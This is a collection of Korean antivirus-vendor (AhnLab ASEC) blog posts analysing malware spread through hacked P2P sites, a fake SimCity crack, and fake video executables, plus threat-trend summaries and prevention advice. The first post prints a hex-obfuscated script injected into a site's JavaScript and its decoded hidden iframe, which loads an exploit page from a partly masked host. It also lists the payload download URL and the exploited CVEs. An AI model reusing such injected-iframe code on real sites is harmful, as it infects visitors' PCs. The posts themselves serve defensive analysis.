악성코드가 탈취한 인증서를 사용하여 자신을 서명한 사례는 국내외에서 간헐적으로 발생해 왔고 언론을 통해 보도 된 바 있다. 이번에 발견된 악성코드는 국내 해킹된 웹 사이트를 통해 유포가 됐으며, PC를 감염시키는 과정에서 생성된 파일들 중에 하나가 특정 P2P 사이트의 인증서로 서명되어 있음을 발견하였다.

[그림 1] 국내 P2P 사이트의 인증서로 서명된 악성코드


[그림 1]이 최종으로 취약점(JAVA, IE, Flash Player)이 존재하는 PC로 다운로드 되어 실행되기까지의 과정을 정리해 보면 아래와 같다.

최초 악성 스크립트 링크가 삽입된 페이지 역시 P2P 웹 사이트였으며, makePCookie.js 파일에 Hex 문자열로 난독화된 형태의 악성 스크립트 링크가 존재 하였다.

http://on****.co.kr/js/makePCookie.js

• 난독화된 악성 스크립트 링크:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x69\x66\x72\x61\x6d\x65 \x77\x69\x64\x74\x68\x3d\x27\x31\x30\x30\x27x68\x65\x69\x67\x68\x74\x3d\x27\x30

\x27\x73\x72\x63\x3d\x27\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6e\x73\x6f\x66\x74\x2e\x64

\x69//---중간생략---//\x2e\x68\x74\x6d\x6c\x27\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e");

 

• 난독화 해제 후 코드:

<iframe width='100' height='0' src='http://snsoft.******bill.co.kr/about/css.html'></iframe>

 

난독화된 코드가 IE에 의해서 해석되면서 또 다른 특정 사이트로부터 악성 스크립트인 css.html을 다운로드 한 후 실행되도록 되어 있다. css.html은 국내 해킹된 웹 사이트에서 흔히 볼 수 있는 Exploit Toolkit인 Dadong 으로 난독화 되어 있으며, 기존의 형태와 마찬가지로 악성코드를 PC에 감염시키기 위해서 다중 취약점(JAVA, IE, Flash Player 등)을 사용했으며, 조건이 부합된 취약점을 통해서 실제 악성코드를 다운로드 및 실행하도록 해두었다.

아래 코드는 난독화된 css.html을 난독화 해제 한 후이며, 가능한 많은 PC를 감염시키기 위해서 자바 취약점 6개, Flash Player 1개, IE 1개 등 총 8개의 취약점을 사용했다.

 

Java

Flash Player

IE

CVE-2011-3544

CVE-2012-0507

CVE-2012-1723

CVE-2012-4681

CVE-2012-5076

CVE-2012-5076

CVE-2013-0634

CVE-2012-1889

[표 1] css.html이 사용한 취약점 ID


만약 PC에 위 [표 1] 중에 하나의 취약점이 존재한다면 해당 취약점으로 인해서 특정 사이트로부터 파일을 다운로드 한 후 실행한다.

-. 파일 다운로드 URL: http://snsoft.*****bill.co.kr/about/up.exe

[그림 2] up.exe의 실행구조


up.exe에 의해서 생성된 "%SYSTEM%\[서비스 이름]+32.dll"의 파일명은 감염된 PC에서 윈도우 정상 파일인 svchost.exe를 통해서 실행되는 서비스 명과 조합되며, 해당 파일을 이용하는 서비스 목록은 아래 레지스트리키 에서 확인이 가능하다.

[그림 3] svchost.exe를 통해서 실행되는 서비스 리스트


또한 up.exe는 감염된 PC의 맥 주소와 운영체제 버전정보 등을 암호화한 후 특정 IP로 전송하는 기능도 있다.

192.168.247.129 -> 116.***.121.*** UDP 360 Source port: simba-cs Destination port: 7125

[그림 4] 암호화 안된 시스템 정보

[그림 5] 암호화된 시스템 정보


 

<V3 제품군의 진단명>

  Trojan/Win32.Agent 


신고
Posted by DH, L@@

 인기게임 '심시티' 를 불법으로 즐길 수 있는, 크랙(crack) 파일로 위장한 악성코드가 발견되어 주의가 필요하다. 해당 악성코드는 '토렌트' 를 통하여 국내, 해외의 불법 파일공유사이트를 통해 유포 중 이고, 인기게임을 공짜로 즐기기 위해 불법 다운로드 하는 유저를 대상으로 하여 빠르게 확산 중이다.

 

[그림 1] 한창 인기몰이중인 '심시티' 신작 게임

 

악성코드는 'SimCityCrake.exe' 와 'mscsvc.dll' 2개의 파일로 구성되어 있다. Simcitycrake.exe 를 실행하면, mscsvc.dll 파일을 windows폴더에 mssyssrv.exe 로 복사 후에 아래와 같이 'Microsoft Windows System Service' 란 이름으로 서비스에 등록한다.

 

[그림 2] 서비스에 등록된 악성코드

 

mscsvc.dll 파일의 내부 코드를 살펴보면 IRC Bot 기능이 동작할 것을 예상 할 수 있다.

[그림 3] mscsvc.dll의 IRC 기능 코드

 

실제로 서비스에 등록된 프로세스는 일본에 위치한 IRC로 구성된 C&C서버에 접속 후, 지속적으로 명령을 전달 받는다. 아래와 같이 서버에 연결 시도중인 것이 확인된다.

 

[그림 4] C&C서버에 연결된 시스템

 

[그림 5] 일본에 위치한 C&C 서버

 

[그림 6] C&C서버와 통신 과정

 

V3 제품에서는 아래와 같이 진단이 가능하다.

 

Win-Trojan/Ircbot.108032

신고
Posted by DH, L@@

안랩 ASEC에서 2012년 9월 국내,외에서 발생한 다양한 보안 위협 이슈와 동향들을 정리한 ASEC 리포트 2012 Vol.33을 발간하였다. 



이 번에 발간된 ASEC 리포트는 2012년 9월 주요 보안 위협 이슈들을 다음과 같이 분석하고 있다.


1) 악성코드 이슈

인터넷 익스플로러 버전 7과 8의 제로데이 취약점을 악용하는 악성코드

자바 취약점을 악용하는 악성코드

트래픽을 유발하는 악성코드

P2P 사이트를 통해 유포되는 무협지 위장 악성코드
다양한 전자 문서들의 취약점을 악용한 악성코드
취약점을 이용하지 않는 한글 파일 악성코드
윈도우 8로 위장한 허위 백신 발견
당첨! 자동차를 받아가세요
도움말 파일로 위장한 악성코드가 첨부된 메일
UPS, Amazon 메일로 위장한 악성코드
악성코드 치료 후 인터넷 연결이 되지 않는다면


2) 모바일 악성코드 이슈

2012 미국 대선을 노린 광고성 애플리케이션 주의

일본 여성을 타깃으로 하는 Loozfon 모바일 악성코드

Anime character named Anaru(Android Malware)

유명 게임으로 위장한 개인정보를 유출하는 악성 앱 주의


3) 보안 이슈

인터넷 익스플로러 제로데이 취약점(CVE-2012-4969)


ASEC에서 발간하는 월간 보안 위협 동향 리포트는 아래 웹 사이트에서 확인 할 수 있다. 


ASEC 보안 위협 동향 리포트 2012 Vol.33 발간

저작자 표시 비영리 변경 금지
신고
Posted by 비회원

- APT 공격 경로 지능화, PC 악성코드 수준의 스마트폰 악성코드 등장 
- 애플리케이션 취약점 공격 국지화, 가상화/클라우드 환경 및 스마트TV도 공격 타깃

글로벌 보안 기업인 안철수연구소[대표 김홍선, www.ahnlab.com, 약칭 ‘안랩’]는 2일 ‘2012년 예상 7대 보안 위협 트렌드’를 발표했다. 이에 따르면 올 한 해 예상되는 주요 이슈는 ▶APT 공격 경로 지능화 ▶PC 악성코드 수준의 스마트폰 악성코드 등장 ▶SNS 통한 보안 위협 증가 ▶애플리케이션 취약점 공격 국지화 ▶특정 국가 산업/기관 시스템 공격 시도 증가 ▶가상화 및 클라우드 환경 공격 본격화 ▶네트워크로 연결되는 시스템에 대한 공격 증가 등이다.

 
1] APT 공격 경로 지능화
 
기업과 기관을 겨냥한 APT 공격이 2012년에도 지속적으로 이어지는 한편, 공격 경로가 지능화할 것으로 예상된다. 이제껏 주된 공격 방식은 타깃 기업/기관의 특정 구성원에게 업무 메일로 위장하는 것이다. 즉, SNS[소셜 네트워크 서비스] 등에서 이메일을 손쉽게 수집해 신뢰할 수 있는 사람으로 위장해 취약점이 포함된 문서를 첨부하거나, 취약점이 존재하는 웹 사이트 주소를 본문에 삽입해 악성코드를 감염시키는 것이다. 널리 사용되는 소프트웨어의 업데이트 관련 파일을 변조한 경우도 있었다. 앞으로는 조직 내부로 반입하기 쉬운 스마트폰이나 보안 관리가 어려운 기술지원 업체의 장비나 소프트웨어 등을 이용한 내부 침입도 발생할 것으로 예측된다.
 
2] PC 악성코드 수준의 스마트폰 악성코드 등장
 
스마트폰, 특히 안드로이드 겨냥 악성코드는 2010년에 악성코드 제작/유포의 가능성을 점쳐 보는 수준이었다면, 2011년에는 금전적 이득을 취할 수 있는 방법을 찾아 대량 제작된 시기였다. 2012년에는 감염의 효율을 높이기 위해 과거 PC용 악성코드에 사용된 기법이 본격적으로 활용될 것으로 예측된다. 즉, 스마트폰 내부에서 자신을 숨기는 은폐 기법과, 모바일 운영체제에 존재하는 취약점을 악용한 루트 권한 탈취 등이 있을 수 있다. 그리고, 사회공학기법을 악용해 웹사이트에서 악성코드 다운로드를 유도하거나, 모바일 웹 브라우저에 존재하는 취약점으로 인해 악성코드가 자동 감염되게 하는 기법도 등장할 것으로 예측된다. 스마트폰에 설치된 인터넷 뱅킹 및 온라인 쇼핑 관련 앱에서 금융/신용카드 정보를 탈취하는 기법도 나올 것으로 예측된다.
 
3] SNS 통한 보안 위협 증가
 
SNS가 정보를 전세계인 빠르게 공유하는 창구인 만큼 악용 사례도 급증하고 있다. 단축 URL이 전체 주소가 다 보이지 않는다는 점을 악용해 악성코드 유포 사이트나 피싱 사이트를 단축 URL로 유포하는 경우가 있었다. 2012년에는 단축 URL 악용 사례가 더 증가하는 한편, SNS가 APT[Advanced Persistent Threat] 공격의 경유지로 이용될 가능성도 있다.
 
4] 애플리케이션 취약점 공격 국지화

2011년에는 운영체제 같은 범용적 애플리케이션의 취약점을 공격하는 경우는 줄어든 반면, 특정 지역에서만 사용되는 애플리케이션의 취약점을 악용한 사례는 증가했다. 아래아한글을 비롯해 동영상 재생 소프트웨어, P2P 및 웹하드 프로그램의 취약점을 악용한 악성코드 유포가 대표적이다. 취약점을 가진 파일을 이메일로 전송하거나 웹 사이트 접속 시 자동으로 악성코드를 감염시키는 방식으로 유포된다. 이런 추세는 2012년에도 이어지는 한편, 애플리케이션 취약점이 APT 공격 등 다양한 보안 위협에 악용되리라 예측된다.
 
5] 특정 국가 산업/기관 시스템 공격 시도 증가

금전적 이익이나 정치적, 종교적 이유로 특정 국가의 산업/기관 시스템을 공격하는 시도가 더욱 증가할 것이다. 이런 공격에 직간접적으로 국가 기관이 개입돼 국가 간 사이버 전쟁으로 확대될 수도 있다. 사용자 부주의로 내부 시스템이 인터넷이나 외부 시스템에 연결되어 있을 때 이를 통해 공격이 들어올 수 있다. 또한 국가 산업/기관 시스템용 특정 소프트웨어의 취약점을 이용해 공격이 이루어질 것으로 예측된다.
 
6] 가상화 및 클라우드 환경 공격 본격화

최근 가상화 기술을 기반으로 클라우드 서비스 등을 사업 모델을 삼는 기업이 증가하고 있다. 그러나 가상화와 클라우드 서비스는 자원 활용의 극대화라는 장점이 있지만, 악용될 경우는 또 하나의 보안 위협이 될 수 있다. 실제로 2011년에 대표적인 가상화 제품의 보안 취약점이 다수 발견됐으며, 실제 금융 정보 탈취를 위한 스파이아이[SpyEye] 악성코드가 아마존 클라우드 서비스를 악용해 배포되기도 했다. 2012년에는 가상화 및 클라우드 서비스의 본격화에 맞추어 다양한 공격이 시도될 것으로 예상된다.
 
7] 스마트 TV 등 네트워크로 연결되는 시스템에 대한 공격 증가  

스마트폰, 스마트 TV를 비롯해 네트워크에 연결되는 임베디드 소프트웨어가 탑재된 기기에 대한 보안 위협이 증가할 것으로 예측된다. 특히 교체 주기가 비교적 길고 실생활과 밀접한 가전 제품은 지속적인 공격에 노출될 가능성이 높다. 실제로 인터넷 접속이 가능한 DVD 리코더를 악용한 공격이 일본에서 있었고, 한 보안 컨퍼런스에서는 닌텐도DS 단말기에 리눅스를 설치해 외부에서 특정 시스템을 제어하는 것을 시연하기도 했다. 단순 반복 작업만을 담당했던 임베디드 시스템이 네트워크에 연결됨에 따라 해킹 또는 디도스 공격의 타깃이 될 가능성이 점차 높아지고 있다.
 
이 밖에 정치적/사회적 목적을 이루고자 시스템을 해킹하거나 디도스 공격을 시도하는 행위인 핵티비즘[Hacktivism] 활동이 2012년에 특히나 많이 발생할 것으로 예측된다. 우리나라의 대선과 총선, 미국과 러시아의 대선 등 전세계적 이슈가 많기 때문이다.

안철수연구소 시큐리티대응센터 이호웅 센터장은 "IT 기기나 인터넷 환경이 발전할수록 보안 위협의 기술이나 확산 경로도 복잡다단해진다. 새로운 기기를 개발하거나 인프라를 구축할 때 보안을 함께 고려하는 것이 중요하다. 또한 개인이나 기업/기관은 정보보안을 일상 생활 및 업무로 인식할 필요가 있다.”라고 강조했다.
 
<참고> 안철수연구소 선정 ‘2011년 예상 7대 보안 위협 트렌드’
▶SNS 활용한 다양한 공격 범용화
▶디도스[DDoS] 공격 지능화
▶사회 기반 시설 겨냥한 타깃형 공격 증가
▶금전 노린 스마트폰 위협 증가
▶무선 인터넷 취약점 노린 위협 등장
▶클라우드, 가상화 기술 이용한 보안 위협 등장
▶제로 데이 공격 기법 고도화 
저작자 표시
신고
Posted by 비회원

 


1. 파일 공유사이트, utorrent, P2P 프로그램에서 다운로드 받은 파일 주의 !


- 파일 공유사이트에서 받은 파일, 믿을 수 있을까 ?

- 많은 사람들이 파일 공유사이트를 이용하는 가장 큰 이유중에 하나는 접근하기 쉽고, 원하는것을 쉽게 얻을 수 있어서 일것 이다. 하지만, 파일 공유사이트 및 특정사이트의 접속만(취약점)으로 악성코드에 감염되는 사례를 다수 보여왔고, 현재에도 여전히 유효하다.


- 악성코드 유형 및 배포 URL 자료 


[그림] 악성코드 유형 분포도 / 악성코드 배포 URL




2. 내 PC의 보안패치, 응용프로그램 패치로 취약점을 조치한다면, 안전할까?


- 악성코드가 이용하는 취약점을 패치하였다면, 사이트 접속만으로 감염되지는 않는다.
하지만, 공유되는 파일에 대한 안전성까지 보장하는 것은 아니다.

- 파일 공유사이트가 악성코드 경유지 뿐만 아니라, 악성코드 제작자의 유포지로 악용되는 점을 안내하고자 한다.





3. 파일 공유사이트, utorrent, P2P 프로그램에서 받은 동영상(AV) 을 살펴 보자.


[그림] 동영상으로 추정되는, exe 로 압축된 형태의 파일




- 동영상 이름으로 보이지만, exe 형태로 압축되어 있다. 이 중에 하나를 확인해 보자.

- exe 형태로 압축된 파일을 실행하면, 동영상 파일이 생성되어 사용자는 정상적인 동영상 파일이 압축된 것으로 믿게 된다.

- 추가 생성되는 악성코드는 사용자가 알 수 없도록 백그라운드로 생성/실행 된다.

- C:\WINDOWS 폴더에 setup.exe / DTLitte.exe / _info.inf 파일을 생성한다.

 [그림] 다운로드 받은 파일 / 생성된 악성코드



- 감염시 증상

방화벽을 우회하여 백도어로 사용될 수 있다.
 

[그림] 악성코드에 의해 변경된 방화벽 예외 설정





4. V3 진단명



Dropper/Agent.1995028
Win-Trojan/Agent.1724928





5. 악성코드의 감염을 예방하고, 피해를 최소화 시키는 방법 !



 1) 윈도우 보안패치를 항상 최신으로 유지한다.
  - Microsoft : http://update.microsoft.com (Windows 정품인증 필요)

 2) 응용 프로그램 패치를 항상 최신으로 유지한다.
  - Adobe Flash Player 업데이트 : http://www.adobe.com/go/getflash/
  - Adobe Reader : http://www.adobe.com/go/getreader/

 3) 신뢰할 수 없는 사이트 및 파일은 접근하지 않는다.

 4) V3 제품을 설치하고, [환경설정] ASD 기능을 활성화 한다.
  - ASD 기능 이란? (바로가기)

 5) AhnLab SiteGuard 설치하여, 위험 사이트는 접근하지 않는다.
  - AhnLab SiteGuard 설치하기 (바로가기)

- Anti-Virus V3

신고
Posted by DH, L@@